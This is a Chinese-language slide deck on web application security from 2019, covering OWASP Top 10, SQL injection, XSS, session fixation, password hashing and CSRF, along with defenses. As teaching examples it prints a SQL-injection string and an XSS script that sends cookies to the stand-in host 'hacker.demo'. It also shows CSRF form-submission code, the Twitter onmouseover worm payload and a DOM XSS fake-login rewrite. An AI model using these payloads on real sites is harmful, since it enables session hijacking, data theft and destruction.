Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Similar to 網站系統安全及資料保護設計認知 2019
Similar to 網站系統安全及資料保護設計認知 2019 (20)
More from Justin Lin
網站系統安全及資料保護設計認知 2019
- 2. 接下來… • 網站系統安全及資料保護設計認知(一) – 資料(訊)保護重要性 – 認識 OWASP TOP 10 – SQL 注入(SQL Injection) – 跨網站指令碼(XSS) – Session 管理與安全 2
- 3. • 網站系統安全及資料保護設計認知(二) – 密碼管理 – 跨網站冒名請求(CSRF) – 再看 XSS – 更多資源 3
- 4. 資料(訊)保護重要性 4
- 8. • 重大負面影響 – 政策 – 商譽 – … www.ithome.com.tw/tech/90726 8
- 10. 被忽略的安全 • 軟體品質 • 軟體開發 • 專責部門 • 專責人員 • 專門工具 • 安全教育 10
- 11. • 通用漏洞披露 • 始於 1999 • 收集特定軟體漏洞並編號 CVE-YYYY- NNNN – OpenSSL 'Heartbleed' vulnerability (CVE- 2014-0160) – CPU 推測執行(speculative execution)漏洞 衍生的變種(CVE-2017-5753、CVE-2017-5715、 CVE-2017-5754) 11 cve.mitre.org CVE 資料庫
- 12. • 通用軟體弱點 • 始於 2005 • What is the difference between a software vulnerability and software weakness? 12 cwe.mitre.org Software weaknesses are errors that can lead to software vulnerabilities. CWE 資料庫
- 13. OWASP • 始於 2001 • 研議協助解決網路軟體安全之標準、工具 與技術文件 • OWASP TOP 10 為其中計畫之一 13 www.owasp.org
- 14. OWASP TOP 10 • 2002 年發起,針對 Web 應用程式最重大、 嚴重的十大弱點進行排名 • 首次 OWASP Top 10 於 2003 發布 • 2004 做了更新,之後每三年改版一次 • 最新正式版本為 OWASP Top 10 2017 14 www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
- 16. OWASP ESAPI • OWASP Enterprise Security API 16 www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
- 17. • Injection 攻擊 – SQL Injection – XML Injection – LDAP Injection – Code Injection 17
- 21. 21 Robert'); DROP TABLE STUDENTS; -- Derper
- 22. SQL Injection 危害 • 迴避認證 • 竊取資料 • 改寫資料庫內容 • 讀寫伺服器上的檔案、執行程式 • … 22
- 23. 23
- 24. SQL Injection 防範 • 避免串接字串方式建立 SQL 24 Java Python
- 26. • Escape 特殊字元 – (ESAPI.encoder().encodeForSQL()) • 輸入驗證(伺服端) – 黑名單(Black List) – 白名單(White List) 26 SQL Injection 防範
- 27. 跨網站指令碼(XSS) 27
- 28. • 變化形式 – Reflected XSS(First-order XSS) – Stored/Persistent XSS(Second-order XSS) – DOM-based/Local XSS • 危害 – 會話劫奪(Session hijacking) – 釣魚(Phishing) – XSS 蠕蟲 – … 28 2010 Twitter
- 29. Session hijacking • 某網站搜尋功能回送查詢字串 29 Could not find any documents including "foo" Search foo http://xss.demo/search?keyword=foo
- 30. 30 <b>foo</b>Search http://xss.demo/search?keyword=<b>foo</b> Could not find any documents including "<b>foo</b>" http://xss.demo/search?keyword=<b>foo</b>
- 31. 31 <script language='javascript'>document.write(document.cookie)</script> Search Could not find any documents including "<script language='javascript'>document.write(document.cookie)</script>" http://xss.demo/search?keyword=Could not find any documents including "<script … SESSION ID
- 32. 32 <script language='javascript'>document.write('<img src="http://hacker.demo/collect?sid=' + document.cookie + '">');</script> http://xss.demo/search?keyword= <script language='javascript'> document.write('<img src="http://hacker.demo/collect?sid=' + document.cookie + '">'); </script>
- 33. 33 http://xss.demo/search?keyword=<script language='javascript'>document.write('<img src="http://hacker.demo/collect?sid=' + document.cookie + '">');</script> http://xss.demo/search?keyword=%3Cscript%20langua ge%3D'javascript'%3Edocument.write('%3Cimg%20src %3D%22http%3A%2F%2Fhacker.demo%2Fcollect%3Fsi d%3D'%20%2B%20document.cookie%20%2B%20'%22 %3E')%3B%3C%2Fscript%3E URL Encoding
- 36. Reflected XSS 36 xss.demo hacker.demo 美女走光圖^o^ http://site.demo/share 1. 按下鏈結 2. 查詢 3. 傳回結果 4. 傳送 session id
- 37. 現代瀏覽器的安全 37
- 38. XSS 基本防範 • 強化輸入驗證 – 黑名單 – 白名單 – (ESAPI.validator()) – (OWASP Java HTML Sanitizer) • 對輸出進行編碼 – (ESAPI.encoder().encodeForURL()) – (OWASP Java Encoder Project) 38
- 39. Session ID? • 被拿走了又如何? • HTTP 會話基本原理 – 每個請求對伺服器來說都是新的訪客請求 – 每次請求時主動告知伺服器必要的資訊 39
- 40. 使用隱藏欄位 40
- 42. 42
- 43. 使用Cookie 43
- 44. • 設定 Cookie • 取得 Cookie 44
- 45. 危險的範例 45
- 46. 危險的範例 46
- 47. 使用URL重寫 47
- 48. 48
- 50. 50
- 51. 51
- 52. Session Fixation 攻擊 • 誘使受害者使用特定的 Session ID – Session ID 透過 URL 參數指定時容易被利用 52
- 53. 53 sidfix.demo 1. 取得 sid2. 放入鏈結 <a href="http://sidfix.demo/login;sid=8 51BB160B811634B03EDD08B60BFD 98D">美女走光圖</a> 美女走光圖^o^ 3. 點選鏈結 4. 喔?需要登入?沒問題! 5. Got it! Session Fixation
- 54. Session 防範對策 • 不從 GET、POST 參數取得 Session Id? – Cookie 是可以偽照的 • 使用 HTTPS • 不將 Session ID 用於 URL – Referer 可能洩漏 Session ID • 不採用 Session ID 預設名稱 54
- 55. Session 防範對策 • 設定 Session 之逾時 • 登入後重新產生 Session ID • 重要操作前進行二次驗證 • 正確設定 Cookie 的 Domain、Secure、 HttpOnly • (啟用伺服端軟體的 Session Fixation 自 動化保護機制) 55
- 56. Session 錯亂? • 來自數個真實的案例 56 // 這是一個 Servlet 內部 private String name; private String passwd; @Override protected void doPost( HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { name = request.getParameter("name"); passwd = request.getParameter("passwd"); if(login(name, passwd)) { List data = query(name); ... } }
- 60. 60 它的密碼是明碼?
- 61. 61
- 63. 63 github.com/danielmiessler/SecLists/pull/155/c ommits/3cb941823b97124e1875552075b91c8 e0a6451f4
- 65. 65
- 67. Secured Salted • 在密碼雜湊時加入鹽值(亂數) – UUID 或其他夠長且唯一的亂數 – 每個使用者產生不同的鹽值 • 分別儲存鹽值與雜湊值 • (驗證時取得使用者輸入之密碼與儲存之 鹽值進行雜湊,然後與儲存之雜湊值比對) 67
- 69. 69
- 71. 慢得剛好 • 現代的運算設備速度越來越快 • 讓破解過程變慢是防禦的一種策略 • BCrypt、PBKDF2、SCRYPT • 不是祕密的祕密 71
- 72. 72
- 74. 密碼強度 74 • 傻瓜密碼 Out • 規則越少越好 • 字元與數字夾雜 • 長度越長越好
- 77. 77
- 79. 79
- 80. 80
- 81. 跨網站冒名請求(CSRF) • Cross-site Request Forgery • 使用者通過驗證且 Session 未過期 • 授權、存取控制設計不良 • 在使用者不知情下進行特定行為 – 修改密碼、轉帳、自動發文、加好友… 81 1. 登入網站 2. 刪除專案 http://webapp.com/project/1/destroy
- 83. GET 的錯? • GET 應用於等冪(Idempotent)操作 – 多次 GET 的結果應相同 – 不改變執行結果,通常不會改變伺服器狀態 • 使用 GET 確實降低了 CSRF 的難度 • 不過也可以透過 POST 來發動類似的請求 83
- 84. 84 <a href="http://www.harmless.com/" onclick=" var f = document.createElement('form'); f.style.display = 'none'; this.parentNode.appendChild(f); f.method = 'POST'; f.action = 'http://webapp.com/account/destroy'; f.submit(); return false;">好康在這裡</a> <img src="http://www.harmless.com/img" width="400" height="400" onmouseover="..." /> 滑鼠略過圖也可以 … 利用一些 JavaScript 寫些 Ajax 請求,都有可能…
- 85. CSRF 防範 • 重新認識 HTTP 請求方法 – https://openhome.cc/Gossip/Programmer/ HttpMethod.html • 使用 Request Token – 不少 Web 框架有內建 – OWASP CSRFGuard • 不依賴 Session Id 作為身份驗證 • 重要行為前要求重新認證與授權 85
- 86. 86 Django
- 87. 87
- 88. CSRF 防範 • 重新認識 HTTP 請求方法 – openhome.cc/Gossip/Programmer/HttpMe thod.html • 使用 Request Token – 不少 Web 框架有內建 – OWASP CSRFGuard • 不依賴 Session Id 作為身份驗證 • 重要行為前要求重新認證與授權 • (OAuth 2?) 88
- 89. 再看 XSS • Reflected XSS • Stored/Persistent XSS • DOM-based/Local XSS 89
- 90. Samy • 2005 年 Samy 跟女友打賭他在 MySpace 上有很多粉絲,將他設成英雄(Hero)。 • Samy 寫了一隻 Stored/XSS 蠕蟲,因為散 播太快而導致 MySpace 當機 • Samy 當時被美國秘密警察逮捕,判三年緩 刑與 90 天的社區服務。 90
- 93. • 推文 • HTML 93 http://www.guardian.co.uk/technology is the best! <a href="http://www.guardian.co.uk/technology" class="tweet-url web" rel="nofollow">http://www.guardian.co.uk/technology</a> is the best!
- 94. • 推文 • <a> 變成 94 <a href="http://a.no/@";onmouseover=";$('textarea:first').val (this.innerHTML);$('.status-update- form').submit();"class="modal-overlay"/ class="tweet-url web" rel="nofollow"> http://a.no/@";onmouseover=";$('textarea:first').val(this. innerHTML);$('.status-update- form').submit();"class="modal-overlay"/
- 95. DOM-based XSS • 直接利用客戶端 JavaScript • (伺服端未參與其中的流程) 95 <html> <title>Welcome!</title>Hi <script> var pos = document.URL.indexOf("name=") + 5; document.write( document.URL.substring(pos,document.URL.length) ); </script> <br>Welcome to our system… </html>
- 98. 改寫畫面 98 http://xss.demo/welcome?name=<script>document.getElementsByTagName("html")[ <script>document.getElementsByTagName("html")[0].innerHTML="Name: <input type='text'/><br>Password: <input type='password'>";</script>
- 100. 其他(資源) • Understanding the OWASP Top 10 Vulnerabilities • The OWASP Top Ten and ESAPI • Cookie & Session & CSRF • [Nodejs] Security: Broken Authentication • Ruby on Rails Security Guide • 駭客手法解析~你不能不知的資安問題!! 100
- 101. 101
- 102. 在漏洞被發現之後… 102
- 103. 在漏洞發生之前… • 軟體品質 • 開發流程 • 專責部門 • 專責人員 • 專門工具 • 安全教育 103